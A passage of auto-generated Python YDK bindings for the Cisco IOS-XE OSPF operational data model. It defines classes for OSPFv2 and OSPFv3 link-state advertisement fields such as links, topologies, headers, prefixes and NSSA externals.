**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: link_data (key)
Link data
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: type
Link type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_topology
Topology specific information
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__()
self.yang_name = "ospfv2-link"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['link_id','link_data']
self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))])
self._leafs = OrderedDict([
('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
('type', (YLeaf(YType.uint8, 'type'), ['int'])),
])
self.link_id = None
self.link_data = None
self.type = None
self.ospfv2_topology = YList(self)
self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)
class Ospfv2Topology(Entity):
"""
Topology specific information
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "ospfv2-link"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2Topology(Entity):
"""
Summary LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__()
self.yang_name = "ospfv2-topology"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
])
self.mt_id = None
self.metric = None
self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value)
class Ospfv2External(Entity):
"""
External LSA
.. attribute:: mt_id (key)
MT\-ID for topology enabled on the link
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: metric
Metric for the topology
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
